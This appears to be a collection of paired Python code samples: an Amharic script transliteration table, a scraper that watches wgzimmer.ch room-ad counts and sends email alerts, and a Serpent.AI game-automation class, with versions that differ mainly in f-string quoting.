'ሬ': ['ré'],
'ር': ['re', 'r'],
'ሮ': ['ro'],
'ሰ': ['sa'],
'ሱ': ['su'],
'ሲ': ['si'],
'ሳ': ['sā'],
'ሴ': ['sé'],
'ስ': ['se', 's'],
'ሶ': ['so'],
'ሸ': ['ša'],
'ሹ': ['šu'],
'ሺ': ['ši'],
'ሻ': ['šā'],
'ሼ': ['šé'],
'ሽ': ['še', 'š'],
'ሾ': ['šo'],
'ቀ': ['qa'],
'ቁ': ['qu'],
'ቂ': ['qi'],
'ቃ': ['qā'],
'ቄ': ['qé'],
'ቅ': ['qe', 'q'],
'ቆ': ['qo'],
'በ': ['ba'],
'ቡ': ['bu'],
'ቢ': ['bi'],
'ባ': ['bā'],
'ቤ': ['bé'],
'ብ': ['be', 'b'],
'ቦ': ['bo'],
'ተ': ['ta'],
'ቱ': ['tu'],
'ቲ': ['ti'],
'ታ': ['tā'],
'ቴ': ['té'],
'ት': ['te', 't'],
'ቶ': ['to'],
'ቸ': ['ča'],
'ቹ': ['ču'],
'ቺ': ['či'],
'ቻ': ['čā'],
'ቼ': ['čé'],
'ች': ['če', 'č'],
'ቾ': ['čo'],
'ኀ': ['ha'],
'ኁ': ['hu'],
'ኂ': ['hi'],
'ኃ': ['hā'],
'ኄ': ['hé'],
'ኅ': ['he', 'h'],
'ኆ': ['ho'],
'ነ': ['na'],
'ኑ': ['nu'],
'ኒ': ['ni'],
'ና': ['nā'],
'ኔ': ['né'],
'ን': ['ne', 'n'],
'ኖ': ['no'],
'ኘ': ['ña'],
'ኙ': ['ñu'],
'ኚ': ['ñi'],
'ኛ': ['ñā'],
'ኜ': ['ñé'],
'ኝ': ['ñe', 'ñ'],
'ኞ': ['ño'],
'አ': ['ʼa'],
'ኡ': ['ʼu'],
'ኢ': ['ʼi'],
'ኣ': ['ʼā'],
'ኤ': ['ʼé'],
'እ': ['ʼe'],
'ኦ': ['ʼo'],
'ከ': ['ka'],
'ኩ': ['ku'],
'ኪ': ['ki'],
'ካ': ['kā'],
'ኬ': ['ké'],
'ክ': ['ke', 'k'],
'ኮ': ['ko'],
'ኸ': ['xa'],
'ኹ': ['xu'],
'ኺ': ['xi'],
'ኻ': ['xā'],
'ኼ': ['xé'],
'ኽ': ['xe', 'x'],
'ኾ': ['xo'],
'ወ': ['wa'],
'ዉ': ['wu'],
'ዊ': ['wi'],
'ዋ': ['wā'],
'ዌ': ['wé'],
'ው': ['we', 'w'],
'ዎ': ['wo'],
'ዐ': ['ʻa'],
'ዑ': ['ʻu'],
'ዒ': ['ʻi'],
'ዓ': ['ʻā'],
'ዔ': ['ʻé'],
'ዕ': ['ʻe'],
'ዖ': ['ʻo'],
'ዘ': ['za'],
'ዙ': ['zu'],
'ዚ': ['zi'],
'ዛ': ['zā'],
'ዜ': ['zé'],
'ዝ': ['ze', 'z'],
'ዞ': ['zo'],
'ዠ': ['ža'],
'ዡ': ['žu'],
'ዢ': ['ži'],
'ዣ': ['žā'],
'ዤ': ['žé'],
'ዥ,ዥ': ['že', 'ž'],
'ዦ': ['žo'],
'የ': ['ya'],
'ዩ': ['yu'],
'ዪ': ['yi'],
'ያ': ['yā'],
'ዬ': ['yé'],
'ይ': ['ye', 'y'],
'ዮ': ['yo'],
'ደ': ['da'],
'ዱ': ['du'],
'ዲ': ['di'],
'ዳ': ['dā'],
'ዴ': ['dé'],
'ድ': ['de', 'd'],
'ዶ': ['do'],
'ጀ': ['ǧa'],
'ጁ': ['ǧu'],
'ጂ': ['ǧi'],
'ጃ': ['ǧā'],
'ጄ': ['ǧé'],
'ጅ': ['ǧe', 'ǧ'],
'ጆ': ['ǧo'],
'ገ': ['ga'],
'ጉ': ['gu'],
'ጊ': ['gi'],
'ጋ': ['gā'],
'ጌ': ['gé'],
'ግ': ['ge', 'g'],
'ጎ': ['go'],
'ጠ': ['ṭa'],
'ጡ': ['ṭu'],
'ጢ': ['ṭi'],
'ጣ': ['ṭā'],
'ጤ': ['ṭé'],
'ጥ': ['ṭe', 'ṭ'],
'ጦ': ['ṭo'],
'ጨ': ['ċa'],
'ጩ': ['ċu'],
'ጪ': ['ċi'],
'ጫ': ['ċā'],
'ጬ': ['ċé'],
'ጭ': ['ċe', 'ċ'],
'ጮ': ['ċo'],
'ጰ': ['p̣a'],
'ጱ': ['p̣u'],
'ጲ': ['p̣i'],
'ጳ': ['p̣ā'],
'ጴ': ['p̣é'],
'ጵ': ['p̣e', 'p̣'],
'ጶ': ['p̣o'],
'ጸ': ['ṣa'],
'ጹ': ['ṣu'],
'ጺ': ['ṣi'],
'ጻ': ['ṣā'],
'ጼ': ['ṣé'],
'ጽ': ['ṣe', 'ṣ'],
'ጾ': ['ṣo'],
'ፀ': ['ṡa'],
'ፁ': ['ṡu'],
'ፂ': ['ṡi'],
'ፃ': ['ṡā'],
'ፄ': ['ṡé'],
'ፅ': ['ṡe', 'ṡ'],
'ፆ': ['ṡo'],
'ፈ': ['fa'],
'ፉ': ['fu'],
'ፊ': ['fi'],
'ፋ': ['fā'],
'ፌ': ['fé'],
'ፍ': ['fe', 'f'],
'ፎ': ['fo'],
'ፐ': ['pa'],
'ፑ': ['pu'],
'ፒ': ['pi'],
'ፓ': ['pā'],
'ፔ': ['pé'],
'ፕ': ['pe', 'p'],
'ፖ': ['po'],
'ቨ': ['va'],
'ቩ': ['vu'],
'ቪ': ['vi'],
'ቫ': ['vā'],
'ቬ': ['vé'],
'ቭ': ['ve', 'v'],
'ቮ': ['vo'],
# Combinations with w
'ቈ': ['qwa'],
'ቊ': ['qwi'],
'ቋ': ['qwā'],
'ቌ': ['qwé'],
'ቍ': ['qwe'],
'ኈ': ['hwa'],
'ኊ': ['hwi'],
'ኋ': ['hwā'],
'ኌ': ['hwé'],
'ኍ': ['hwe'],
'ኰ': ['kwa'],
'ኲ': ['kwi'],
'ኳ': ['kwā'],
'ኴ': ['kwé'],
'ኵ': ['kwe'],
'ጐ': ['gwa'],
'ጒ': ['gwi'],
'ጓ': ['gwā'],
'ጔ': ['gwé'],
'ጕ': ['gwe'],
# Combinations with wa
'ሏ': ['lwa'],
'ቧ': ['bwa'],
'ዟ': ['zwa'],
'ጧ': ['ṭwā'],
'ሟ': ['mwa'],
'ቷ': ['twa'],
'ዧ': ['žwa'],
'ጯ': ['ċwā'],
'ሯ': ['rwa'],
'ቿ': ['čwa'],
'ጿ': ['ṣwā'],
'ሷ': ['swa'],
'ኗ': ['nwa'],
'ዷ': ['dwa'],
'ፏ': ['fwā'],
'ሿ': ['šwa'],
'ኟ': ['ñwa'],
'ጇ': ['ǧwa'],
# Combinations with ya
'ፘ':['rya'],
'ፙ':['mya'],
'ፚ':['fya'],
# Special initial
'ኧ': ['ă']
}
def romanize(text):
output = ''
for char in text:
try:
output += _transliteration[char][-1]
except KeyError:
output += char
return output
if __name__ == '__main__':
print(f"{romanize('ሰላም እንደምን አለህ?').capitalize()}")
|
from bs4 import BeautifulSoup,Tag
import requests
import json
import sys
from datetime import datetime
import re
import time
import yagmail
from config import CITY_NAMES
from config import WGZIMMER_HEADERS
from config import SENDER_EMAIL_ACCOUNT
from config import FREQUENCY
from config import RECEIVER_EMAIL
from config import WGZIMMER_CONDITIONS
from room_entity import WgzimmerRoomEntity
from utils import print_info
from utils import notify_through_email
pre_ads_found = -1
def get_total_ads_number(WGZIMMER_CONDITIONS):
url = "https://www.wgzimmer.ch/en/wgzimmer/search/mate.html?"
print_info("Getting total ads number for lowest price from " + str(WGZIMMER_CONDITIONS["priceMin"]) + " to " + str(WGZIMMER_CONDITIONS["priceMax"]) + " at " + str(WGZIMMER_CONDITIONS["state"]))
print_info("\nForm data submited" + str(WGZIMMER_CONDITIONS))
print_info("\nSending request with post method to" + url + "Headers:" + str(WGZIMMER_HEADERS))
response = requests.post(url, WGZIMMER_CONDITIONS,headers = WGZIMMER_HEADERS)
print_info("\n Response received::::")
soup = BeautifulSoup(response.text, features = "html.parser")
container = soup.find('div',id='container')
script = container.find('script',text=re.compile('total*'))
total_ads_found = int(script.contents[0].split('\"')[-2].split(' ')[1])
return total_ads_found
def wgzimmer_refresh(pre_ads_found):
print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS)
msg_change = 'Given the search conditions as below, there has been changes happened on the wgzimmer website\n' \
+ f'Lowest price from {WGZIMMER_CONDITIONS['priceMin']} highest price to {WGZIMMER_CONDITIONS['priceMax']}\n' \
+ f'Place of the property:{WGZIMMER_CONDITIONS['state']}\n Search only students:{WGZIMMER_CONDITIONS['student']}\n' \
+ f'Search permanent room:{WGZIMMER_CONDITIONS['permanent']}\nCurrent number of ads:{total_ads_found}'
if pre_ads_found == -1:
pre_ads_found = total_ads_found
elif pre_ads_found - total_ads_found != 0:
pre_ads_found = total_ads_found
notify_through_email('Changes happened on the wgzimmer website',msg_change)
else:
print("\nNo change detected on wgzimmer website::::\n")
return pre_ads_found
# def wgzimmer_main():
# print("Specify the criterions you need on the Wgzimmer below")
# while True:
# while True:
# WGZIMMER_CONDITIONS["priceMin"] = int(input("Enter you lowest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMin"] in range(200,1501):
# break
# else:
# print("Price not correct")
# while True:
# WGZIMMER_CONDITIONS["priceMax"] = int(input("Enter you highest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMax"] in range(200,1501):
# break
# else:
# print("Price not correct")
# if (WGZIMMER_CONDITIONS["priceMin"] <= WGZIMMER_CONDITIONS["priceMax"]):
# break
# else:
# print("Price not correct(lowest price must be higher lower than highest price)")
# print("Choose one of the cities from below")
# for it in CITY_NAMES.keys():
# print(it)
# while True:
# State = input("Type the city name above you want to search for a room:")
# if (State in CITY_NAMES.keys()):
# break
# else:
# print("Illegal selection!!")
# while True:
# WGZIMMER_CONDITIONS["student"] = input("Decide to search for rooms only for students or not(y/n/all)")
# if WGZIMMER_CONDITIONS["student"] == "y":
# WGZIMMER_CONDITIONS["student"] = "true"
# break
# elif WGZIMMER_CONDITIONS["student"] == "n":
# WGZIMMER_CONDITIONS["student"] = "false"
# break
# elif WGZIMMER_CONDITIONS["student"] == "all":
# WGZIMMER_CONDITIONS["student"] = "none"
# break
# print("Illegal selection!!")
# while True:
# Permanent = input("Search for unlimited rooms?(y/n/all)")
# if Permanent == "y":
# Permanent = "true"
# break
# elif Permanent == "n":
# Permanent = "false"
# break
# elif Permanent == "all":
# Permanent = "none"
# break
# print("Illegal selection!!")
#room_entities = get_room_list(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# while True:
# print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
# total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# msg_change = f"Given the search conditions as below, there has been changes happened on the wgzimmer website\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\nCurrent number of ads:{total_ads_found}"
# if pre_ads_found == -1:
# msg_init = f"Started to monitor changes based on the following conditions:\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\n Current number of ads:{total_ads_found}"
# notify_through_email(msg_init)
# pre_ads_found = total_ads_found
# elif pre_ads_found - total_ads_found != 0:
# pre_ads_found = total_ads_found
# notify_through_email(msg_change)
# else:
# print("No change detected")
# #Sleep for a constant time
# time.sleep(3600/FREQUENCY)
#print(f"\n {total_ads_found} Rooms found:\n")
#print('{:40}{:25}{:25}'.format('id','From','Until'))
#for entity in room_entities:
# print('{:40}{:25}{:25}'.format(str(entity.id),str(entity.from_date) ,str(entity.until_date))) | from bs4 import BeautifulSoup,Tag
import requests
import json
import sys
from datetime import datetime
import re
import time
import yagmail
from config import CITY_NAMES
from config import WGZIMMER_HEADERS
from config import SENDER_EMAIL_ACCOUNT
from config import FREQUENCY
from config import RECEIVER_EMAIL
from config import WGZIMMER_CONDITIONS
from room_entity import WgzimmerRoomEntity
from utils import print_info
from utils import notify_through_email
pre_ads_found = -1
def get_total_ads_number(WGZIMMER_CONDITIONS):
url = "https://www.wgzimmer.ch/en/wgzimmer/search/mate.html?"
print_info("Getting total ads number for lowest price from " + str(WGZIMMER_CONDITIONS["priceMin"]) + " to " + str(WGZIMMER_CONDITIONS["priceMax"]) + " at " + str(WGZIMMER_CONDITIONS["state"]))
print_info("\nForm data submited" + str(WGZIMMER_CONDITIONS))
print_info("\nSending request with post method to" + url + "Headers:" + str(WGZIMMER_HEADERS))
response = requests.post(url, WGZIMMER_CONDITIONS,headers = WGZIMMER_HEADERS)
print_info("\n Response received::::")
soup = BeautifulSoup(response.text, features = "html.parser")
container = soup.find('div',id='container')
script = container.find('script',text=re.compile('total*'))
total_ads_found = int(script.contents[0].split('\"')[-2].split(' ')[1])
return total_ads_found
def wgzimmer_refresh(pre_ads_found):
print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS)
msg_change = 'Given the search conditions as below, there has been changes happened on the wgzimmer website\n' \
+ f'Lowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n' \
+ f'Place of the property:{WGZIMMER_CONDITIONS["state"]}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n' \
+ f'Search permanent room:{WGZIMMER_CONDITIONS["permanent"]}\nCurrent number of ads:{total_ads_found}'
if pre_ads_found == -1:
pre_ads_found = total_ads_found
elif pre_ads_found - total_ads_found != 0:
pre_ads_found = total_ads_found
notify_through_email('Changes happened on the wgzimmer website',msg_change)
else:
print("\nNo change detected on wgzimmer website::::\n")
return pre_ads_found
# def wgzimmer_main():
# print("Specify the criterions you need on the Wgzimmer below")
# while True:
# while True:
# WGZIMMER_CONDITIONS["priceMin"] = int(input("Enter you lowest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMin"] in range(200,1501):
# break
# else:
# print("Price not correct")
# while True:
# WGZIMMER_CONDITIONS["priceMax"] = int(input("Enter you highest price expected(at least 200 at most 1500):"))
# if WGZIMMER_CONDITIONS["priceMax"] in range(200,1501):
# break
# else:
# print("Price not correct")
# if (WGZIMMER_CONDITIONS["priceMin"] <= WGZIMMER_CONDITIONS["priceMax"]):
# break
# else:
# print("Price not correct(lowest price must be higher lower than highest price)")
# print("Choose one of the cities from below")
# for it in CITY_NAMES.keys():
# print(it)
# while True:
# State = input("Type the city name above you want to search for a room:")
# if (State in CITY_NAMES.keys()):
# break
# else:
# print("Illegal selection!!")
# while True:
# WGZIMMER_CONDITIONS["student"] = input("Decide to search for rooms only for students or not(y/n/all)")
# if WGZIMMER_CONDITIONS["student"] == "y":
# WGZIMMER_CONDITIONS["student"] = "true"
# break
# elif WGZIMMER_CONDITIONS["student"] == "n":
# WGZIMMER_CONDITIONS["student"] = "false"
# break
# elif WGZIMMER_CONDITIONS["student"] == "all":
# WGZIMMER_CONDITIONS["student"] = "none"
# break
# print("Illegal selection!!")
# while True:
# Permanent = input("Search for unlimited rooms?(y/n/all)")
# if Permanent == "y":
# Permanent = "true"
# break
# elif Permanent == "n":
# Permanent = "false"
# break
# elif Permanent == "all":
# Permanent = "none"
# break
# print("Illegal selection!!")
#room_entities = get_room_list(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# while True:
# print(f"\nRefreshing results on Wgimmer website:::{datetime.now()}\n")
# total_ads_found = get_total_ads_number(WGZIMMER_CONDITIONS["priceMin"],WGZIMMER_CONDITIONS["priceMax"],State,WGZIMMER_CONDITIONS["student"],Permanent)
# msg_change = f"Given the search conditions as below, there has been changes happened on the wgzimmer website\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\nCurrent number of ads:{total_ads_found}"
# if pre_ads_found == -1:
# msg_init = f"Started to monitor changes based on the following conditions:\nLowest price from {WGZIMMER_CONDITIONS["priceMin"]} highest price to {WGZIMMER_CONDITIONS["priceMax"]}\n Place of the property:{State}\n Search only students:{WGZIMMER_CONDITIONS["student"]}\n Search permanent room:{Permanent}\n Current number of ads:{total_ads_found}"
# notify_through_email(msg_init)
# pre_ads_found = total_ads_found
# elif pre_ads_found - total_ads_found != 0:
# pre_ads_found = total_ads_found
# notify_through_email(msg_change)
# else:
# print("No change detected")
# #Sleep for a constant time
# time.sleep(3600/FREQUENCY)
#print(f"\n {total_ads_found} Rooms found:\n")
#print('{:40}{:25}{:25}'.format('id','From','Until'))
#for entity in room_entities:
# print('{:40}{:25}{:25}'.format(str(entity.id),str(entity.from_date) ,str(entity.until_date))) |
import warnings
warnings.simplefilter("ignore")
import offshoot
import subprocess
import signal
import shlex
import time
import os, os.path
import atexit
from serpent.game_agent import GameAgent
from serpent.game_launchers import *
from serpent.window_controller import WindowController
from serpent.input_controller import InputController, InputControllers
from serpent.frame_grabber import FrameGrabber
from serpent.game_frame_limiter import GameFrameLimiter
from serpent.sprite import Sprite
from serpent.utilities import clear_terminal, is_windows, SerpentError
import skimage.io
import skimage.color
import numpy as np
from redis import StrictRedis
from serpent.config import config
class GameError(BaseException):
pass
class Game(offshoot.Pluggable):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.config = config.get(f"{self.__class__.__name__}Plugin", dict())
self.platform = kwargs.get("platform")
default_input_controller_backend = InputControllers.NATIVE_WIN32 if is_windows() else InputControllers.PYAUTOGUI
self.input_controller = kwargs.get("input_controller") or default_input_controller_backend
self.window_id = None
self.window_name = kwargs.get("window_name")
self.window_geometry = None
self.dashboard_window_id = None
self.window_controller = WindowController()
self.is_launched = False
self.frame_grabber_process = None
self.frame_transformation_pipeline_string = None
self.game_frame_limiter = GameFrameLimiter(fps=self.config.get("fps", 30))
self.api_class = None
self.api_instance = None
self.environments = dict()
self.environment_data = dict()
self.sprites = self._discover_sprites()
self.redis_client = StrictRedis(**config["redis"])
self.pause_callback_fired = False
self.kwargs = kwargs
@property
@offshoot.forbidden
def game_name(self):
return self.__class__.__name__.replace("Serpent", "").replace("Game", "")
@property
@offshoot.forbidden
def game_launcher(self):
return self.game_launchers.get(self.platform)
@property
@offshoot.forbidden
def game_launchers(self):
return {
"steam": SteamGameLauncher,
"executable": ExecutableGameLauncher,
"web_browser": WebBrowserGameLauncher,
"retroarch": RetroarchGameLauncher
}
@property
@offshoot.expected
def screen_regions(self):
raise NotImplementedError()
@property
@offshoot.forbidden
def api(self):
if self.api_instance is None:
self.api_instance = self.api_class(game=self)
else:
return self.api_instance
@property
@offshoot.forbidden
def is_focused(self):
return self.window_controller.is_window_focused(self.window_id)
@offshoot.forbidden
def launch(self, dry_run=False):
self.before_launch()
if not dry_run:
self.game_launcher().launch(**self.kwargs)
self.after_launch()
@offshoot.forbidden
def relaunch(self, before_relaunch=None, after_relaunch=None):
clear_terminal()
print("")
print("Relaunching the game...")
self.stop_frame_grabber()
time.sleep(1)
if before_relaunch is not None:
before_relaunch()
time.sleep(1)
subprocess.call(shlex.split(f"serpent launch {self.game_name}"))
self.launch(dry_run=True)
self.start_frame_grabber()
self.redis_client.delete(config["frame_grabber"]["redis_key"])
while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
time.sleep(0.1)
self.window_controller.focus_window(self.window_id)
if after_relaunch is not None:
after_relaunch()
def before_launch(self):
pass
def after_launch(self):
self.is_launched = True
current_attempt = 1
while current_attempt <= 100:
self.window_id = self.window_controller.locate_window(self.window_name)
if self.window_id not in [0, "0"]:
break
time.sleep(0.1)
time.sleep(3)
if self.window_id in [0, "0"]:
raise SerpentError("Game window not found...")
self.window_controller.move_window(self.window_id, 0, 0)
self.dashboard_window_id = self.window_controller.locate_window("Serpent.AI Dashboard")
# TODO: Test on macOS and Linux
if self.dashboard_window_id is not None and self.dashboard_window_id not in [0, "0"]:
self.window_controller.bring_window_to_top(self.dashboard_window_id)
self.window_controller.focus_window(self.window_id)
self.window_geometry = self.extract_window_geometry()
print(self.window_geometry)
def play(self, game_agent_class_name="GameAgent", frame_handler=None, **kwargs):
if not self.is_launched:
raise GameError(f"Game '{self.__class__.__name__}' is not running...")
game_agent_class = offshoot.discover("GameAgent", selection=game_agent_class_name).get(game_agent_class_name, GameAgent)
if game_agent_class is None:
raise GameError("The provided Game Agent class name does not map to an existing class...")
game_agent = game_agent_class(
game=self,
input_controller=InputController(game=self, backend=self.input_controller),
**kwargs
)
# Look if we need to auto-append PNG to frame transformation pipeline based on given frame_handler
png_frame_handlers = ["RECORD"]
if frame_handler in png_frame_handlers and self.frame_transformation_pipeline_string is not None:
if not self.frame_transformation_pipeline_string.endswith("|PNG"):
self.frame_transformation_pipeline_string += "|PNG"
self.start_frame_grabber()
self.redis_client.delete(config["frame_grabber"]["redis_key"])
while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
time.sleep(0.1)
self.window_controller.focus_window(self.window_id)
# Override FPS Config?
if frame_handler == "RECORD":
self.game_frame_limiter = GameFrameLimiter(fps=10)
try:
while True:
self.game_frame_limiter.start()
game_frame, game_frame_pipeline = self.grab_latest_frame()
try:
if self.is_focused:
self.pause_callback_fired = False
game_agent.on_game_frame(game_frame, game_frame_pipeline, frame_handler=frame_handler, **kwargs)
else:
if not self.pause_callback_fired:
print("PAUSED\n")
game_agent.on_pause(frame_handler=frame_handler, **kwargs)
self.pause_callback_fired = True
time.sleep(1)
except Exception as e:
raise e
# print(e)
# time.sleep(0.1)
self.game_frame_limiter.stop_and_delay()
except Exception as e:
print(e)
finally:
self.stop_frame_grabber()
@offshoot.forbidden
def extract_window_geometry(self):
if self.is_launched:
return self.window_controller.get_window_geometry(self.window_id)
return None
@offshoot.forbidden
def start_frame_grabber(self, pipeline_string=None):
if not self.is_launched:
raise GameError(f"Game '{self.__class__.__name__}' is not running...")
if self.frame_grabber_process is not None:
self.stop_frame_grabber()
frame_grabber_command = f"serpent grab_frames {self.window_geometry["width"]} {self.window_geometry["height"]} {self.window_geometry["x_offset"]} {self.window_geometry["y_offset"]}"
pipeline_string = pipeline_string or self.frame_transformation_pipeline_string
if pipeline_string is not None:
frame_grabber_command += f" {pipeline_string}"
self.frame_grabber_process = subprocess.Popen(shlex.split(frame_grabber_command))
signal.signal(signal.SIGINT, self._handle_signal)
signal.signal(signal.SIGTERM, self._handle_signal)
atexit.register(self._handle_signal, 15, None, False)
@offshoot.forbidden
def stop_frame_grabber(self):
if self.frame_grabber_process is None:
return None
self.frame_grabber_process.kill()
self.frame_grabber_process = None
atexit.unregister(self._handle_signal)
@offshoot.forbidden
def grab_latest_frame(self):
game_frame_buffer, game_frame_buffer_pipeline = FrameGrabber.get_frames_with_pipeline([0])
return game_frame_buffer.frames[0], game_frame_buffer_pipeline.frames[0]
def _discover_sprites(self):
plugin_path = offshoot.config["file_paths"]["plugins"]
sprites = dict()
sprite_path = f"{plugin_path}/{self.__class__.__name__}Plugin/files/data/sprites"
if os.path.isdir(sprite_path):
files = os.scandir(sprite_path)
for file in files:
if file.name.endswith(".png"):
sprite_name = "_".join(file.name.split("/")[-1].split("_")[:-1]).replace(".png", "").upper()
sprite_image_data = skimage.io.imread(f"{sprite_path}/{file.name}")
sprite_image_data = sprite_image_data[..., np.newaxis]
if sprite_name not in sprites:
sprite = Sprite(sprite_name, image_data=sprite_image_data)
sprites[sprite_name] = sprite
else:
sprites[sprite_name].append_image_data(sprite_image_data)
return sprites
def _handle_signal(self, signum=15, frame=None, do_exit=True):
if self.frame_grabber_process is not None:
if self.frame_grabber_process.poll() is None:
self.frame_grabber_process.send_signal(signum)
if do_exit:
exit()
| import warnings
warnings.simplefilter("ignore")
import offshoot
import subprocess
import signal
import shlex
import time
import os, os.path
import atexit
from serpent.game_agent import GameAgent
from serpent.game_launchers import *
from serpent.window_controller import WindowController
from serpent.input_controller import InputController, InputControllers
from serpent.frame_grabber import FrameGrabber
from serpent.game_frame_limiter import GameFrameLimiter
from serpent.sprite import Sprite
from serpent.utilities import clear_terminal, is_windows, SerpentError
import skimage.io
import skimage.color
import numpy as np
from redis import StrictRedis
from serpent.config import config
class GameError(BaseException):
pass
class Game(offshoot.Pluggable):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.config = config.get(f"{self.__class__.__name__}Plugin", dict())
self.platform = kwargs.get("platform")
default_input_controller_backend = InputControllers.NATIVE_WIN32 if is_windows() else InputControllers.PYAUTOGUI
self.input_controller = kwargs.get("input_controller") or default_input_controller_backend
self.window_id = None
self.window_name = kwargs.get("window_name")
self.window_geometry = None
self.dashboard_window_id = None
self.window_controller = WindowController()
self.is_launched = False
self.frame_grabber_process = None
self.frame_transformation_pipeline_string = None
self.game_frame_limiter = GameFrameLimiter(fps=self.config.get("fps", 30))
self.api_class = None
self.api_instance = None
self.environments = dict()
self.environment_data = dict()
self.sprites = self._discover_sprites()
self.redis_client = StrictRedis(**config["redis"])
self.pause_callback_fired = False
self.kwargs = kwargs
@property
@offshoot.forbidden
def game_name(self):
return self.__class__.__name__.replace("Serpent", "").replace("Game", "")
@property
@offshoot.forbidden
def game_launcher(self):
return self.game_launchers.get(self.platform)
@property
@offshoot.forbidden
def game_launchers(self):
return {
"steam": SteamGameLauncher,
"executable": ExecutableGameLauncher,
"web_browser": WebBrowserGameLauncher,
"retroarch": RetroarchGameLauncher
}
@property
@offshoot.expected
def screen_regions(self):
raise NotImplementedError()
@property
@offshoot.forbidden
def api(self):
if self.api_instance is None:
self.api_instance = self.api_class(game=self)
else:
return self.api_instance
@property
@offshoot.forbidden
def is_focused(self):
return self.window_controller.is_window_focused(self.window_id)
@offshoot.forbidden
def launch(self, dry_run=False):
self.before_launch()
if not dry_run:
self.game_launcher().launch(**self.kwargs)
self.after_launch()
@offshoot.forbidden
def relaunch(self, before_relaunch=None, after_relaunch=None):
clear_terminal()
print("")
print("Relaunching the game...")
self.stop_frame_grabber()
time.sleep(1)
if before_relaunch is not None:
before_relaunch()
time.sleep(1)
subprocess.call(shlex.split(f"serpent launch {self.game_name}"))
self.launch(dry_run=True)
self.start_frame_grabber()
self.redis_client.delete(config["frame_grabber"]["redis_key"])
while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
time.sleep(0.1)
self.window_controller.focus_window(self.window_id)
if after_relaunch is not None:
after_relaunch()
def before_launch(self):
pass
def after_launch(self):
self.is_launched = True
current_attempt = 1
while current_attempt <= 100:
self.window_id = self.window_controller.locate_window(self.window_name)
if self.window_id not in [0, "0"]:
break
time.sleep(0.1)
time.sleep(3)
if self.window_id in [0, "0"]:
raise SerpentError("Game window not found...")
self.window_controller.move_window(self.window_id, 0, 0)
self.dashboard_window_id = self.window_controller.locate_window("Serpent.AI Dashboard")
# TODO: Test on macOS and Linux
if self.dashboard_window_id is not None and self.dashboard_window_id not in [0, "0"]:
self.window_controller.bring_window_to_top(self.dashboard_window_id)
self.window_controller.focus_window(self.window_id)
self.window_geometry = self.extract_window_geometry()
print(self.window_geometry)
def play(self, game_agent_class_name="GameAgent", frame_handler=None, **kwargs):
if not self.is_launched:
raise GameError(f"Game '{self.__class__.__name__}' is not running...")
game_agent_class = offshoot.discover("GameAgent", selection=game_agent_class_name).get(game_agent_class_name, GameAgent)
if game_agent_class is None:
raise GameError("The provided Game Agent class name does not map to an existing class...")
game_agent = game_agent_class(
game=self,
input_controller=InputController(game=self, backend=self.input_controller),
**kwargs
)
# Look if we need to auto-append PNG to frame transformation pipeline based on given frame_handler
png_frame_handlers = ["RECORD"]
if frame_handler in png_frame_handlers and self.frame_transformation_pipeline_string is not None:
if not self.frame_transformation_pipeline_string.endswith("|PNG"):
self.frame_transformation_pipeline_string += "|PNG"
self.start_frame_grabber()
self.redis_client.delete(config["frame_grabber"]["redis_key"])
while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
time.sleep(0.1)
self.window_controller.focus_window(self.window_id)
# Override FPS Config?
if frame_handler == "RECORD":
self.game_frame_limiter = GameFrameLimiter(fps=10)
try:
while True:
self.game_frame_limiter.start()
game_frame, game_frame_pipeline = self.grab_latest_frame()
try:
if self.is_focused:
self.pause_callback_fired = False
game_agent.on_game_frame(game_frame, game_frame_pipeline, frame_handler=frame_handler, **kwargs)
else:
if not self.pause_callback_fired:
print("PAUSED\n")
game_agent.on_pause(frame_handler=frame_handler, **kwargs)
self.pause_callback_fired = True
time.sleep(1)
except Exception as e:
raise e
# print(e)
# time.sleep(0.1)
self.game_frame_limiter.stop_and_delay()
except Exception as e:
print(e)
finally:
self.stop_frame_grabber()
@offshoot.forbidden
def extract_window_geometry(self):
if self.is_launched:
return self.window_controller.get_window_geometry(self.window_id)
return None
@offshoot.forbidden
def start_frame_grabber(self, pipeline_string=None):
if not self.is_launched:
raise GameError(f"Game '{self.__class__.__name__}' is not running...")
if self.frame_grabber_process is not None:
self.stop_frame_grabber()
frame_grabber_command = f"serpent grab_frames {self.window_geometry['width']} {self.window_geometry['height']} {self.window_geometry['x_offset']} {self.window_geometry['y_offset']}"
pipeline_string = pipeline_string or self.frame_transformation_pipeline_string
if pipeline_string is not None:
frame_grabber_command += f" {pipeline_string}"
self.frame_grabber_process = subprocess.Popen(shlex.split(frame_grabber_command))
